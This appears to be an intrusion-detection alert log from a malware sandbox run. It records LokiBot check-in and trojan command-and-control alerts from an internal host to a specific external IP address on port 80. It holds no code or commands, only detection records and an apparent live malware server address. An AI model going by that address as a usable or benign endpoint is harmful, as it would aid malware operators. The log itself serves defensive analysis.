2025-01-07T12:32:16.694494+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:17.621099+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:18.524599+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:19.413561+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:20.319720+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.208840+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:22.190721+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:23.083462+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.973870+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:24.880636+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:25.829746+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:26.723358+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:27.582510+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:28.619054+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:29.504390+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:30.382420+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.256603+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:32.155614+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:33.032901+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.924411+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:34.814297+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:35.704114+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:36.588546+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:37.473584+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:38.360546+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.253004+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:40.116039+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.987508+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:41.861754+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:42.736881+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:43.630025+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:44.529692+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:45.411818+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:46.293457+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.179130+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:48.074620+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.984690+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:49.862472+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:50.758629+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:51.655150+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:52.567085+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:53.479625+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:54.584481+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:55.446641+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:56.333834+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.237309+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:58.121179+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:59.003527+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.878899+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:00.752916+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:01.662274+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:02.549471+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:03.476176+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:04.420628+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:05.289917+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.157706+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:07.168337+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:08.065316+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.983613+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:10.036766+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.925247+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:11.841098+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:12.953872+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:13.973579+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:14.849018+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:15.804831+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:16.682925+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:17.566164+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:18.615544+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:19.538604+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:20.414906+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:21.330905+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.254058+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:23.161672+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:24.052352+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.970591+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:25.885204+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:26.771343+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:27.680964+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:28.568840+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:29.482591+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:30.418199+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:31.283218+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.183439+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:33.064766+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.993234+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:34.894254+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:35.815203+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:36.704614+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:37.618568+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:38.510581+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:39.427169+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:40.300156+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:41.178680+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.221421+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:43.104720+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:44.073014+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.978438+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:45.848723+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:46.736292+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:47.784973+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:48.642095+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:49.553437+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:50.465759+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:51.347194+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:52.222675+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:53.621252+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:54.519173+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:55.412870+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:56.462921+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:57.340598+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.239632+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:59.128389+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.979403+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:01.024157+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50139	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:32:00.796955+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:01.754699+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:02.549908+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:03.602114+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:04.490438+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:05.412187+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.187246+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:08.083804+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.974835+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:10.073415+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:11.223373+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:12.117368+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:13.004316+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.932697+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:14.805465+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:15.769592+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:16.694494+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:17.621099+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:18.524599+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:19.413561+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:20.319720+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.208840+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:22.190721+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:23.083462+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.973870+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:24.880636+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:25.829746+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:26.723358+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:27.582510+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:28.619054+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:29.504390+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:30.382420+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.256603+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:32.155614+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:33.032901+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.924411+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:34.814297+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:35.704114+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:36.588546+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:37.473584+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:38.360546+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.253004+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:40.116039+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.987508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:41.861754+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:42.736881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:43.630025+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:44.529692+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:45.411818+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:46.293457+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.179130+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:48.074620+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.984690+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:49.862472+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:50.758629+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:51.655150+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:52.567085+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:53.479625+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:54.584481+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:55.446641+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:56.333834+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.237309+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:58.121179+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:59.003527+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.878899+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:00.752916+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:01.662274+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:02.549471+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:03.476176+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:04.420628+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:05.289917+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.157706+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:07.168337+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:08.065316+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.983613+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:10.036766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.925247+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:11.841098+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:12.953872+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:13.973579+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:14.849018+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:15.804831+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:16.682925+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:17.566164+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:18.615544+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:19.538604+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:20.414906+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:21.330905+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.254058+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:23.161672+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:24.052352+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.970591+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:25.885204+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:26.771343+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:27.680964+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:28.568840+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:29.482591+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:30.418199+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:31.283218+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.183439+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:33.064766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.993234+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:34.894254+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:35.815203+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:36.704614+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:37.618568+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:38.510581+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:39.427169+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:40.300156+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:41.178680+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.221421+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:43.104720+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:44.073014+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.978438+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:45.848723+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:46.736292+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:47.784973+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:48.642095+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:49.553437+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:50.465759+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:51.347194+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50129	94.156.177.41	80	TCP
